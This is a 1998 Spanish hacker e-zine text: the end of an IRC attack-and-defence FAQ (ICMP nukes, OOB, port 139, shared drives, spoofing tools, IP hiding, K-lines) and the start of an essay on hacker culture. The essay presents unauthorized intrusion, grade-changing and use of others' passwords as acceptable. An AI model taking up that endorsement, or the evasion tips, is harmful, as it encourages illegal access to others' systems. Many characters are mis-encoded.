obtengamos no siempre es verφdica. De hecho, esto es lo que ocurre con la mayorφa de los
·ltimos ataques, en los cuales siempre se usa spoof.
No obstante, un icmp-nuke normal no suele venir spoofeado y se puede detectar fßcilmente
(obviamente me estoy refiriendo a un client nuke; si el paquete no te llegara a tφ sino al
servidor t· no te enterarφas de nada). Cualquier programa analizador de paquetes puede
valernos. Valgan como ejemplo:
- las propias funciones de logeo que implementa "de casa" el dialer y pila TCP/IP
"Trumpet Winsock" (para los que conecten de esta forma, sin usar el dialup de Windows).
- idem para cualquier programa firewall, como el "Conseal".
- "tcpdump" o "sniff-it" para UNIX.
- "ICMP Watch" para Windows.
5.- ┐Puedo evitar los (client) icmp-nukes?
R.- Sφ, solo tienes que filtrar los mensajes ICMP que te envφen. Esto lo puedes hacer con
cualquier software firewall. En Win95 es bastante usado el Conseal.
6.- En la red xxxxxx hay un tφo que siempre me estß molestando y no deja de atacarme.
┐Puedes ayudarme?
R.- Si he escrito este documento es para ayudar a la gente y sobre todo, para que lo lea.
:-P Asφ que usa la informaci≤n que aquφ se encuentra e intenta sacarle provecho por tφ
mismo en vez de pedir ayuda a terceros. No tengo tiempo para centrarme en casos
particulares, a lo mejor ni siquiera conozco la red xxxxxx. Si tienes alguna duda
contacta conmigo y si lo considero conveniente aparecerß solucionada en esta misma
secci≤n en la siguiente revisi≤n del documento.
7.- ┐C≤mo puedo garantizar mi anonimato en IRC? Actualmente he recibido e-mails con amenazas e
insultos de gente de los canales que frecuento, ┐c≤mo puedo evitarlo?
R.- Una de las ventajas del IRC es precisamente que guarda el anonimato. Todos los datos que
el servidor IRC tiene y puede ofrecer sobre un usuario dado son los que previamente uno
ha introducido en su cliente IRC, a excepci≤n de la direcci≤n IP desde donde nos
conectemos. Por tanto, podemos introducir datos falsos: nombre falso, direcci≤n de correo
falsa, Θtc. Lo ·nico que en principio no se puede esconder es tu direcci≤n IP, que la
toma el servidor en el momento de hacer tu conexi≤n TCP al servidor de IRC. Sin embargo,
hasta esta ·ltima se puede esconder usando algunas de las tΘcnicas descritas en este
documento, como el bouncing o el DNS Inject, lo que nos harφa completamente an≤nimos.
8.- El otro dφa entrΘ en un canal y me dijeron que tenφa el puerto 139 abierto... que podφan
resetearme... ┐C≤mo lo puedo cerrar?
R.- Puedes tener el puerto 139 abierto sin que "te puedan resetear": es cuesti≤n de tener el
parche contra OOB instalado en tu sistema. De hecho, es un parche obligado. Ademßs
no solo es vulnerable el puerto 139. No obstante, si lo quieres cerrar, solo tienes que
desinstalar el soporte Netbios (en la configuraci≤n de red). S≤lo necesitas tener soporte
TCP/IP para conectarte a Internet; todo lo demßs sobra. Cuantos mßs servicios ofrezca una
mßquina mßs insegura y propensa a ser hackeada serß. Hay que procurar abrir ·nicamente los
servicios que realmente nos hagan falta.
9.- A un amigo le entraron en su Windows y le empezaron a borrar carpetas. ┐C≤mo lo hicieron?
R.- Tendrφa archivos o unidades compartidas sin password. Windows 95, por defecto, no pone
password a los recursos compartidos, lo que es un grave problema de seguridad. Si usas
recursos compartidos, íno olvides poner un password! Y si no los usas pues íno los tengas
activados! Para esto ·ltimo basta con desactivar Netbios (una raz≤n mßs para tener cerrado
el puerto 139). De lo contrario, cualquiera podrß entrar en tu HD: leer lo que quiera,
borrar ficheros, modificarlos... íMuy peligroso!
10.- ┐Se puede mandar ataques como land o jolt, o spoofear desde Windows?
R.- La pila TCP/IP que trae Windows tiene ciertas limitaciones que impiden, por ejemplo, el
spoof. Sin embargo, hay un programa en fase de pruebas que puede spoofear y mandar muchos
de estos ataques desde Windows. Lo hace implementando su propia pila TCP/IP y no usando
las funciones de Winsock normales. Por ahora solo he visto una versi≤n beta que ·nicamente
funciona en Win95. Existe tambiΘn una versi≤n comercial o al menos estaba en desarrollo.
El programa se llama "Aggressor" y teneis su URL en la secci≤n de Resources.
11.- Me gustarφa saber mßs sobre los K/G-Lines: en quΘ consisten, lo que tienes que hacer para
que no te hagan uno...
R.- Simplemente es como un ban pero aplicado a hosts o dominios enteros. Es decir, si tu
direcci≤n IP o el dominio al que pertenece tienen alguna de estas lines no podrßs
conectarte a la red IRC, no te dejarß. La diferencia entre un K-Line y un G-Line es
que Θsta ·ltima es global, o sea, que se aplica a todos los servidores de la red IRC y
por tanto no habrß forma, en principio, de entrar a esa red IRC. Un K-Line se aplica a un
servidor en particular de la red; es decir, que se nos deniega el acceso a la red IRC a
travΘs de ese servidor, lo que no implica que no se pueda entrar por cualquier otro.
TambiΘn es posible que una misma K-Line estΘ activa en distintos servidores a la vez
(o incluso en todos, lo cual serφa equivalente a una G-Line).
Estas lines se suelen poner como respuesta a abusos por parte de uno mismo o de alg·n otro
usuario perteneciente a tu dominio y la duraci≤n de las mismas depende de la polφtica que
sigan los administradores de la red de IRC. Para evitarlo, lo ·nico que hay que hacer es
portarse bien o al menos ser suficiente bueno y que no te pillen mientras haces cosas malas };-)
12.- ┐QuΘ es una I-Line?
R.- Es una entrada en el fichero de configuraci≤n del ircd que permite variar el n·mero de
clones admisibles desde una determinada direcci≤n IP o dominio. La a±ade un administrador
del servidor IRC para por ejemplo permitir la entrada al IRC desde cybercafΘs
(donde normalmente todos los ordenadores se ven como una misma direcci≤n IP) o mßquinas
multiusuario (universidades, Θtc).
13.- ┐QuΘ es un script Perl?
R- Perl es un lenguaje de programaci≤n interpretado. Un script (a secas) es algo que
automatiza tareas, una especie de programa (asφ tenemos scripts de IRC, de shell [Unix], Θtc)
Un script Perl es un script de Unix que en vez de usar una shell para su ejecuci≤n usa el
propio programa de Perl. En definitiva, se trata de un programa escrito para Perl.
14.- Do you have an English translation of this page?
A.- Not at this moment, I hope it will be available soon though. I'm looking for somebody to
translate this doc since I'm very busy for doing it by myself.
15.- Tengo informaci≤n sobre ataques / bugs / fixes que no se listan en este documento.
┐Puedo ayudar?
R.- Por supuesto. Este documento jamßs estarß 100% completo porque ni soy perfecto ni tengo
todo el tiempo del mundo. Pero intentarΘ actualizarlo con la mayor frecuencia posible.
Toda la ayuda y support que pueda recibir de parte vuestra serßn bien acogidos. Puedes
enviar tus comentarios a
[email protected]
16.- Me gustarφa saber mßs acerca del "DNS inject". ┐Alguna idea?
R.- Sφ, claro. Mira la URL dada en la secci≤n "Resources" para una completa informaci≤n
acerca de su funcionamiento y posible puesta en marcha (desde un punto de vista prßctico).
De todas formas, creo oportuno decir que es una tΘcnica bastante costosa de implementar y
bastante desagradecida, ya que la mayorφa de servidores de nombres (DNS) estßn ya
parcheados (en particular, los relacionados con redes importantes de IRC).
9.- Agradecimientos.
Quisiera dar las gracias a
[email protected] por echarle un vistazo a la primera versi≤n de este
texto y por sus comentarios desinteresados sobre Θl. Asφ mismo, a todos los que me habeis
apoyado con vuestros comentarios u opiniones acerca de este escrito. íNo dejeis de seguir
haciΘndolo!
TambiΘn me gustarφa saludar desde aquφ a todos mis amigos y conocidos del IRC, en especial a
los canales #insultos, #hack, #hackers, #hack_novatos, #amiga y #llfb de la red irc-hispano.
10.- Modificaciones.
* Cambios en este documento en la versi≤n 1.0:
- A±adida esta secci≤n. :-)
- Mejor explicado lo del "spanning tree" (estructura de una red IRC).
- A±adido el concepto de "hop".
- A±adidas un par de URL's en la secci≤n de "resources".
- A±adida secci≤n "tΘcnicas avanzadas" incluyendo "bouncing" y "DNS Inject".
- A±adidos diversos fuentes en C: ICMP nuke, OOB, ssping, bouncer, ...
- A±adidas direcciones donde encontrar numerosos parches.
- A±adidas URL's de referencia en la secci≤n de "spoof".
- A±adidos nuevos ataques: teardrop, land, teardrop modificado y smurf.
* Cambios en este documento en la versi≤n 2.0:
- Variaci≤n de las condiciones de distribuci≤n de este documento.
- Sustituido c≤digo fuente de los diferentes programas por enlaces a los mismos
(se han puesto en ficheros independientes).
- A±adidos los ataques: bonk, syndrop, overdrop, nestea y hanson.
- A±adido c≤mo "robar" un bouncer asφ como nuevo c≤digo de bouncer con soporte de password.
- A±adida secci≤n "feedback (FAQ)", con las respuestas a las preguntas mßs frecuentes
formuladas al autor acerca de este documento.
- A±adida secci≤n "defensa", con algunos consejos generales para defendernos de distintos
ataques.
- A±adido apartado "Wingate".
- A±adido concepto de "i-line" en la secci≤n introductoria.
- A±adida secci≤n "trojans".
- A±adido apartado "recursos compartidos".
- Revisadas las distintas secciones y ampliadas algunas con mßs info o alg·n link.
* Cambios en este documento en la versi≤n 2.1:
- A±adido apartado "Ping of death".
- A±adida secci≤n "Modem DoS", con los apartados "/Msg ComX" y "+++ATH0".
- A±adido source "script.ini".
- A±adido apartado "Back Orifice" en la secci≤n de troyanos.
- A±adido apartado "NetBus" en la secci≤n de troyanos.
- A±adido RFC1459.
- A±adidos peque±os cambios en la "FAQ" y en "Resources".
11.- Notas finales.
Espero que este artφculo os haya servido al menos para comprender un poco mßs el
funcionamiento del IRC.
TambiΘn me gustarφa recordar que el IRC no es un campo de batalla, y que no se debe atacar a
la gente asφ porque asφ, salvo "en defensa propia" y pocos casos mßs justificados. O:-)
En cualquier caso un ataque nunca estß justificado desde el punto de vista de los ircops,
asφ que cuidado con las K/G-lines ;-)
Se agradecerφa toda clase de comentarios y sugerencias para mejorar el documento: bug reports,
asuntos que creßis no estßn bien explicados, temas que faltan y se deberφan incluir, ...,
y en definitiva todo lo que os gustarφa que se incluyese en el documento. TambiΘn se aceptan
O-lines ;-).
Se rechazarß estrictamente todo aquello que salga de la temßtica asφ como dudas personales.
Si lo creo conveniente y las dudas son generalizadas las intentarΘ aclarar en posteriores
revisiones de este documento (ver secci≤n "Feedback") pero (y repito) no a nadie en particular.
Teneis que comprender que no tengo todo el tiempo del mundo.
Podeis contactar con el autor de este escrito por email:
[email protected] .
O localizarme en el IRC hispano bajo el nick de RoMaNSoFt. Podeis consultar la web de la red
Hispana de IRC para averiguar servidores por donde entrar (ver secci≤n "Resources").
c'U l8er!!!!!
_______________________________________________________________________________________________
(c) RoMaN SoFt / LLFB, 1998
La distribuci≤n de este documento es "libre", con la ·nica condici≤n de informar al autor en
caso de subirlo a alg·n ftp site o pßgina web, y siempre que no sea con fines comerciales ni
reporte beneficio econ≤mico alguno. Las mismas restricciones se aplican a cualquier otra forma
de difusi≤n p·blica (revistas, news, Θtc). En el caso de publicaciones (revistas) Θsta deberß
ser completamente gratis. El documento debe ser distribuido de forma φntegra, no estß
permitida la modificaci≤n total o parcial ni la difusi≤n de partes aisladas del mismo.
En caso de incumplimiento se emprenderß las acciones legales pertinentes. Contactar con
el autor para cualquier otra modalidad o forma de difusi≤n.
###############################################################################################
(c) RoMaN SoFt / LLFB, 1998.- (·ltima modificaci≤n de este fichero: 04/01/99)
##############################################################
NOTA IMPORTANTE: #
yo (ZeD) recomiendo que visites la web del autor #
ya que este texto a sido pasado a TXT de un HTML #
por lo tanto en el html ( y en la web) podras encontrar #
muchos scripts y programas que aqui se describen. #
Recuerda que la dire de este texto es: #
http://www.esi.us.es/~roman/tacticas.html #
##############################################################
((((((((((((((ZeD-wOrLd-EzInE numero 5)))))))))))))))))))))))))))))))))))))))))))))))))))))))))
[email protected]
S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N.
S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N.
S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N.
S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N.
S.T.A.I.N. S.T.A.I.N.
S.T.A.I.N. Presenta... S.T.A.I.N.
S.T.A.I.N. S.T.A.I.N.
S.T.A.I.N. UNA INTRODUCCION BASICA AL HACKING Y AL UNDERGROUND S.T.A.I.N.
S.T.A.I.N. S.T.A.I.N.
S.T.A.I.N. S.T.A.I.N.
S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N.
S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N.
S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N.
[email protected]
║ 0.0 ║ INDICE
1.0 Introduccion - Historia de "Una Introduccion basica al Hacking..."...
2.0 Definicion...........................................................
2.1 Manifiesto HBO.......................................................
3.0 Origenes.............................................................
4.0 La apariencia de un hacker...........................................
5.0 La etica del hacker..................................................
6.0 Clasificacion........................................................
6.1 Wannabes y Lamers....................................................
6.2 Pseudo-hackers ......................................................
6.3 Hackers (propiamente dicho)..........................................
7.0 Concejos utiles......................................................
8.0 El Underground (Informatico).........................................
8.1 ¿Que es todo eso de Phreaking, Carding... ?...........................
9.0 Internet for dummies (muuuuuuuy elemental)...........................
9.1 Que es Internet?.....................................................
9.2 Un poco de historia..................................................
9.3 TCP/IP: Un protocolo de comunicaciones...............................
9.4 Formas de conectarse.................................................
9.5 Quienes compones Internet?...........................................
9.6 Quienes administran Internet?........................................
9.7 Que se necesita para estar adentro?..................................
9.8 Que servicios brinda Internet?.......................................
9.9 Productos de Internet................................................
10.0 Cyberpunks...........................................................
10.1 El movimiento literario..............................................
10.2 La subcultura........................................................
10.3 La moda de hoy.......................................................
11.0 Agradecimientos......................................................
12.0 Citas................................................................
║ 1.0 ║ INTRODUCCION - HISTORIA DEL DOCUMENTO "UNA INTRODUCCION BASICA AL HACKING..."
=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Todo empezo con un file de Hugo Cornwall viejisimo que hablaba de los hackers y que
me parecio muy interesante; entonces le traduje unas cosas y le fui agregando otras
a medida que pasaba el tiempo. De esta manera nacio este documento.
El nombre original de este documento era "Hacking y Hackers verdaderos", el cual estaba
disponible en algunos BBSs de Buenos Aires, Argentina. Este documento fue un proyecto dejado
que le pude haber agregado millones de cosas mas, pero como una introduccion TOTALMENTE basica
al hacking y al underground, lo que es el hacking, quienes lo componen y otras yerbas, cumple
su proposito. Para los que conozcan la saga "Hacking y Hackers verdaderos", esta seria la
version 4.0 del file (muchisimo mas recortado); destinada al publico abierto de internet.
Lo que es este documento: con este documento pretendo dar una introduccion MUY BASICA al
hacking y al underground en general a aquellas personas que recien ingresan, para que conozcan
que son los hackers, que hacen, su ideologia; que son los phreakers, y otras yerbas.
Lo que no es este documento: una guia paso a paso de como hackear; si ya estas en el
ambiente tambien este documento sera interesante para ti.
Antes que nada.... todo lo expresado aqui es opinion mia y no significa que este 100%
correcto; soy humano como vos y me puedo equivocar. Puedes llegar a encontrar definiciones,
conceptos e ideas que quiza no correspondan con las tuyas; si hay algun error grave, y solo si,
hazmelo saber a
[email protected]. Recuerda: nadie es perfecto, ni siquiera tu.
║ 2.0 ║ DEFINICION
==-=-=-=-=
La palabra hacker deriva de "hack", que significa "un corte repentino", o
"hachar". Este termino, del sajon coloquial, es tambien utilizado para
describir la accion mediante la cual los tecnicos del service golpeaban
bruscamente los telefonos publicos u otros aparatos con la pretension de
arreglarlos (ya que antiguamente tenian valvulas y no transistores). Al que
llevava a cabo este metodo de reparacion se lo llamaba "hacker".
El hacking se manifiesta en sus comienzos (1968, si mal lo recuerdo) como
una contracultura que se desarrolla en forma paralela al crecimiento de
un nuevo establishment tecnocratico: la contracultura de las corporaciones.
Modernamente el Hacking se considera como una actividad recreativa,
educativa y semi-legal, impulzada principalmente por la curiosidad natural del
hombre (el deseo de conocer mas), que consiste en tratar de penetrar sin
autorizacion a computadoras o sistemas para ver que hay dentro y de llegar
hasta donde nadie habia llegado antes.
El tema de a donde apunta esta actividad y las actividades que lo rodean
siempre fue desentendido, por lo que voy a tratar de poner los puntos sobre las
ies.
Lo que proponen los hackers es la liberacion del monopolio de la informacion
en manos del Gobierno en pos de una democratizacion de la tecnologia. Ellos
tienen bien en claro que el Gobierno trabaja con informacion vital de todos
los ciudadanos y se reservan datos que prefieren mantener confidenciales que
supuestamente deberian estar al alcance de todos. En pocas palabras quieren que
la informacion sea libre, gratuita e igual para todos (sin importar raza, sexo,
religion, nacionalidad, color, o nada), ya que en la era digital quienes
dominen las computadoras dominaran la conciencia, la informacion y el
pensamiento de las personas.
A algunos hackers (REALES, no pseudohackers), generalmente los que son mas
veteranos, les interesaria hacer fraudes masivos, modificar su cuenta bancaria,
caja de ahorro, ficha de empleo, usar numeros de tarjetas de credito robados en
Internet, etc.. pero piensan que es muy dificil y generalmente son atrapados
por la policia, el Servicio Secreto o el FBI. Por lo que se limitan a hacer cosas
mas simples o que no traigan consecuencias tan severas.
A la mayoria de los hackers les gusta hacer cosas no tan complicadas y con
las que uno no pueda ir a la carcel tan facilmente, como cambiar sus notas en el
Colegio/Universidad; conseguir passwords y usar cuentas ajenas en BBSs o Internet; hackear
un BBS, obtener atributos de sysop o de super usuario, bajarse todas las cosas
interesantes pero NO CRASHEARLO (hacerlo mierda) porque esa seria la cosa mas
estupida que un hacker que quiera ser bueno (hablando de calidad) podria hacer:
si uno destruye un BBS o un sistema al que accedio, ademas de ser un estupido,
esta perdiendo una oportunidad como pocas de ampliar sus conocimientos, probar
todas las cosas posibles y siempre tratar de llegar mas alla. Si el hacker
investigo y aprendio todo lo posible, lo ideal seria que publicara su
descubrimiento o experiencia en una revista electronica, BBS, Internet o lo que
sea para que otras personas que no saben tanto aprendan (por mas que sigan sus
mismos pasos).
La mayoria de los hackers que conoci coincide en que la diversion esta en
DESARROLLAR y ENTENDER un sistema (DOS/Windows 95/NT, Unix, Macintosh, VMX, etc) PRODUCIENDO
finalmente las HABILIDADES (lleva tiempo y es donde la mayoria se rinde) y
HERRAMIENTAS (hacer programas para automatizar el trabajo tedioso. El mejor
ejemplo es el SATAN "Sistem Administrator Tool for Analizing Networks" o SANTA
que es lo mismo que el anterior pero mas nuevo: "Sistem Administrator Network
Tool Analizer") para VENCER la seguridad de ese sistema (persevera y triunfaras
y PENETRAR en el para aprender de sus debilidades y hacer ahi dentro lo que se
le de la gana.
En resumen: APRENDER + ADAPTAR = SUPERAR y luego DISFRUTAR.
Generalmente lo mejor de entrar a un sistema es que uno nunca sabe lo que
va a encontrar... todos los sistemas son una caja de Pandora que esta
esperando ser abierta para nuestra satisfaccion. El dicho dice: "La curiosidad
mato al gato... PERO LA SATISFACCION LO REVIVIO"
2.2 MANIFIESTO HBO
El siguiente es un manifiesto del Grupo HBO (Hacked By Owls) de Argentina que lo
hicieron conocer en el Primer Congreso de Virus, Hacking y Computer Underground
organizado por Fernando Bonsenbiante (ex Virus Report); realizado en el Centro Cultural
Recoleta en el año 1992 o 93 en Buenos Aires, Argentina.
01234567890123456789
The quick brown fox jumps over the lazy DOG. [El veloz zorro marron salta
sobre el perro perezoso]
Esta conferencia sucks [apesta], como todas las conferencias de "hackers", y
eso no tiene nada que ver con las buenas intenciones de F. Bostandante [asi lo
llaman los hackers], es simplemente que hablar a cerca de los hackers es
pointless [no tiene sentido].
Los hackers no somos ni queremos ser Rock Stars, y toda esta publicidad
barata se la pueden meter en culo, no la necesitamos ni nos hace bien.
Es logico que los que no saben quieran saber que es un "hacker", bueno vamos
a intentar dar una pequeña definicion. def: TODA PERSONA CURIOSA ES UN HACKER
POTENCIAL.
La tecnologia nos la venden con etiquetas que nos dicen para que usarla,
todo eso es mentira; la tecnologia es solo una herramienta, hay que saber darla
vuelta, y usarla del otro lado. Todos escuchamos que la informacion debe ser
libre, esto solo significa que todos tenemos que poder elejir el pasto del que
comemos. La investigacion en ciencias es una de las actividades intelectuales
mas gratificantes, y todos los investigadores son en cierta medida hackers. Si
el gobierno anuncia ahora que que privatiza la CNEA [Comision Nacional de Energia
Atomica (Argentina)], porque lo mando el banco mundial, y si Cavallo [Ex ministro
de Economia de Argentina] manda al Conicet a lavar los platos, y todo eso es tan
LEGAL, no preguntamos quien es quien para juzgar la legalidad de un grupo de
personas que lo unico que buscan es el conocimiento. Desafiar las leyes en las
que uno no cree es la unica manera de seguir creyendo en uno mismo y no
convertirse en un pedazo de sillon para que venga alguien y se siente arriba.
Manifiesto HBO
Hacked by Owls
║ 3.0 ║ ORIGENES
=-=-=-=-
La palabra "hack" tuvo su origen mucho antes de que las telecomunicaciones
estuviesen al alcance de todos y de que un adolescente pudiera entrar con su
modem desde su casa a un sistema protegido por una dudosa seguridad. La palabra
"Hacker" nacio alrededor de 1959 en el Massachusets Institute of Technologies
(MIT). Ser un hacker en esa epoca era pertenecer a la aristocracia que conocia
realmente a las computadoras, por oposicion a los "meros usuarios" que sabian
solos lo estrictamente necesario para hacer su trabajo. Los hackers de esa
epoca pasaban noches enteras en el MIT o en universidades programando. Esto era
porque todavia no existian las computadoras personales, porque una computadora
podia valer millones de dolares y una persona normalmente no tenia acceso a una
excepto que trabajara para una empresa muy importante o que estudiara en una
universidad que tuviera una.
El hecho de que generalmente un hacker trabajara de noche se debia a que las
maquinas se usaban furante el dia en tareas mas "serias" que los proyectos de
los hackers. Un hacker en esa epoca programaba aplicaciones raras como
lenguajes de programacion nuevos, juegos, editores de texto, sistemas
operativos u otras aplicaciones que nadie les habia encargado pero que ellos
querian hacerlas lo mismo. Estas aplicaciones podrian terminar como un exito
economico para las empresas que los empleaban o para los mismos hackers. Por
ejemplo, el sistema operativo UNIX empezo como un trabajo a escondidas de un
hacker y termino siendo un exito comercial impresionante.
[Cutpasteado de una Virus Report]
║ 4.0 ║ LA APARIENCIA DEL HACKER
-=-=-=-=-=-=-=-=-=-=-=-=
De todas las formas que el hacking es encuadrado en las peliculas, libros,
revistas y TV, la que mas confunde a la gente (y la que mas molesta a los
hackers) es la concentracion del hacker en la imagen de un nerd solitario, con
anteojos y lleno de acne juvenil adicto al cafe negro y al cigarrillo, sentado
frente a su monitor y teclado por horas intentando dar con la clave, tratando
de encontrar un bug, una backdoor o algo similar que le permita acceder a un
sistema.
Pero hoy en dia las cosas cambiaron bastante... esa imagen desaparecio...
ahora los hackers no son para nada nerds; al contrario, generalmente la unica
materia que tienen aprobada con mas de 7 es computacion o alguna similar. Se
juntan en grupos y se identifican con nombres como "Digital Anarchy" [DAN],
"Hacked by owls" HBO, etc. en Argentina o Legion of Doom, Legion of Lucifer,
Masters of Deception, NuKe, etc. en EEUU. Los hackers de hoy ya no se visten
con ropa formal como lo muestran las peliculas o describen algunos libros, sino
que lo hacen como se les da la gana, sin modas... son ellos mismos. Los que
generalmente estan metidos en el Under escuchan grupos de musica alternativos o
Hard Core al estilo Punk, Skank, Heavy, Trash y Grunge; aunque conoci un
monton que escucha Trance, Tecno o con musica clasica.
Por suerte una de las ultimas peliculas que se hizo es "Hackers" y la
representacion de estos es un poco mas realista y modernizada; aunque la pelicula da asco.
La apariencia de los hackers cambio, los hackers evolucionan y lo seguiran
haciendo a medida que la tecnologia siga avanzando.
║ 5.0 ║ LA ETICA DEL HACKER
-=-=-=-=-=-=-=-=-=-
Steven Levy resumio la etica del hackers en su libro "Hackers: Heroes of the
computer revolution" asi:
* El acceso a las computadoras -y a cualquier cosa que pueda
enseñarte algo acerca de la forma en que funciona el mundo-
debe ser total e ilimitado.
* Apelar siempre a la imperativa: -Manos a la obra!
* Toda informacion debe ser libre y/o gratuita.
* Hay que desconfiar de la autoridad. Hay que promover la
descentralizacion.
* Los hackers deberan ser juzgados por sus hackeos, no por
falsos criterios como titulos, edad, raza, o posicion.
* En una computadora se puede crear arte y belleza.
* Las computadoras pueden cambiar la vida para mejor.
El 4 de Agosto de 1989 en Amsterdam, Holanda, cuando se celebro la primera
reunion internacional de hackers, la Galactic Hacker Party, un tal Felstein
presento una declaracion aprobada por unanimidad de los asistentes a la fiesta.
Esta decia:
Considerando que:
La sociedad democratica esta basada en el derecho de todos a
acceder a la informacion publica y el derecho de asociarse
libremente, y que en años recientes, se han desarrollado
estructuras tecnicas para manipular esa informacion, las
cuales obscurecen la accesibilidad a esa informacion a traves
de la complejidad, y que esas estructuras tecnicas tambien
sirven para aislar a la gente y para anular su derecho de
asociacion, AFIRMAMOS Y DECLARAMOS:
* El derecho a descubrir no solamente toda la informacion
publica, sino tambien el funcionamiento de los mecanismos
por los cuales esta informacion es recolectada y procesada;
* La responsabilidad de evitar dañar a otros mientras
ejercitamos este derecho de descubrimiento, y
* El derecho y responsabilidad de compartir el conocimiento
y las habilidades que sirven para revelar la funcion de los
mecanismos de procesamiento de informacion, mientras
guardamos estrictamente la confidencialidad de la
informacion que ha sido confiada o entregada a dichos
mecanismos por partes privadas.
Decimos NO a la sociedad de la informacion, SI a una sociedad
informada.
[Cut-pasteado del "Hackers, la guerrilla informatica"]
║ 6.0 ║ CLASIFICACION DE LOS HACKERS
-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Es hora de aclarar que existen dos principales clases de "hackers":
(1) los PSEUDOHACKERS (de lo que esta lleno)
(2) los HACKERS (propiamente dicho) o Veteranos / ELITE
(a lo que casi todos apuntamos a ser)
Despues estan los WANNABES y los LAMERS (que es lo peor que se puede ser).
6.1 NEWBIES, WANNABES Y LAMERS
Newbie significa novato, el que recien comienza. Este documento esta apuntado a los newbies
o a las personas que simplemente tienen ganas de leerlo. TODOS hemos pasado por la etapa de
newbie... es irremediable. Esta en nosotros superar esa etapa sin entrar en el wannabe-ismo ni
en el lamer-ismo. Mo hay problema de ser newbie (no hay nada malo), lo malo es ser wannabe o
lamer.
Wannabe significa "want to be", querer ser. En este caso un hacker. Lamer,
que no existe en el ingles comun sino en el ingles usado en el underground, es un wannabe muy
estupido y terriblemente molesto.
Estos dos tipos de "seres" no entienden que en la vida no se puede tener todo servido y que
tienen que investigar y esforzarse para lograr lo que quieren. Lo unico que quieren son
resultados, por lo que no se interesan por el funcionamiento de nada... ni de las centrales
telefonicas ni del funcionamiento de los sistemas ni de nada. Lo unico que quieren saber es
como se hace para robar plata de un banco, cambiar sus notas en la Universidad, hablar
gratis por telefono (que en realidad es Phreaking), como destruirle el disco duro a
un enemigo o a la computadora de su Universidad (que eso es de los crashers,
pero para ellos son todos lo mismo) y un monton de tonterias. Obviamente no se los consideran
hackers ya que el ser hacker esta solo en sus sueños.
La mayoria de los wannabes y lamers miran a los hackers como idolos o dioses, y
harian cualquier cosa por ser como ellos y actuar como ellos. Es por eso que
leen todo lo que encuentran sobre el tema y hacen millones de preguntas
estupidas (las peores preguntas son las de los lamers) sin ni siquiera tener
los conocimientos basicos de como manejar una computadora, sistemas operativos
o lenguajes de programacion. Lo peor y lo que mas molesta de esta "gente" es
que no toman al hacking por lo que es, sino por lo que se puede hacer con el;
se piensan que es cualquier cosa y, al no tener paciencia y estar apurados por
ver resultados satisfactorios, (si es que alguna vez intentan hacer algo) se
cansan, dicen que es muy dificil y se rinden.
Recuerden: ejecutar un exploit no es ser hacker! Saben que hace el exploit? Saben por que
funciona? Usar el PHF no es ser hacker! Saben lo que es PHF? Saben por que funcionaba y ahora
casi no? Si pueden responder las preguntas estarian en posibilidades de entrar a la siguiente
etapa:
6.2 "PSEUDO-HACKERS O HACKERS TRUCHOS"
Cualquiera puede transformarse en un pseudo-hacker: alguien te da una IP
y el password de un sistema, escribes la IP, esperas el login, ingresas el password
y... entraste!; das vueltas por unos minutos, buscas algo interesante, copias lo que se
te da la gana y finalmente te desconectas. O si eres estupido: pones un troyano, un virus o
crasheas el sistema y evitas que alguien mas tenga la oportunidad de aprender algo o
de acceder a la misma info que vos.
Seguramente te divertiste por unas horas y sacaste unos archivos espectaculares;
pero... piensa bien, no hiciste nada mas que seguir un camino bien marcado por
alguien y seguramente por un monton de personas mas e hiciste caso a algunas
advertencias que te habian dado.
A estos les llamo pseudos porque copiaron algo que otro hizo y descubrieron
algo ya conocido. PERO estas experiencias "truchas" van entrenando al futuro
hacker y le van dando experiencia en las distintas formas de acceder a un
sistema, para que finalmente lo haga por si solo y se convierta en un
Hacker real.
El pseudohacking es una etapa en la vida del hacker que es inevitable puesto que nadie nace
sabiendo. El problema es no vivir siempre en esta etapa y descubrir las cosas nosotros mismos.
En esta etapa se supone que el pseudohacker sabe lo que hace y como funcionan las cosas
(los scripts; *nix, Win NT, etc).
6.3 HACKERS (PROMIAMENTE DICHO)
Finalmente llegamos a donde todos quieren llegar. Los verdaderos hackers.
Estos, en contraste con los pseudohackers, hacen sus propios descubrimientos, investigan,
aprenden, mejoran sus tecnicas o aprenden nuevas tecnicas (ya que van apareciendo nuevos
sistemas), programas, protocolos, etc.. Los hackers verdaderos son los que descubren bugs y
otras tecnicas de ataques a sistemas.
Estos hackers a veces conocen a otros que son considerados "ELITE", son los
pioneros, los que mas saben... son los doctores de la era digital. Algunos se
juntan en grupos y comparten sus conocimientos, como por ejemplo "The CHAOS Computer
Club" o CCC que entraron a la NASA (este grupo ya es bastante viejo) y otros prefieren estar
solos como por ejemplo Emmanuel Goldstein de la revista 2600 que la viene publicando desde
mil novecientos setenta y algo. El es considerado mundialmente como un pionero del
hacking. Un claro ejemplo de este tipo de hackers es el famoso Kevin Mitnik.
║ 7.0 ║ ALGUNOS CONCEJOS
=-=-==-=-=-=-=-=
El exito del hacking depende de que tu investigacion. Los materiales para
investigar estan en todas partes: tambien como el material orientado
directamente al hacking del tipo que encontras en cualquier BBS, en Internet,
en reuniones dedicadas al tema, chats, escuchado en algunas esquinas durante
el recreo de un Congreso, etc. Enormes cantidades de literatura fundamental
se publica todos los dias por los departamentos de marketing de las compañias
de computadoras y repartidas a todos los comerciantes: fajos de papeleria y
camiones cargados de documentacion interna que tienen importantes pistas o
pedazos de informacion que estan sueltos esperando a ser recogidos. Depende
de cada uno de ustedes reconocer estos "tesoros" por lo que son, y
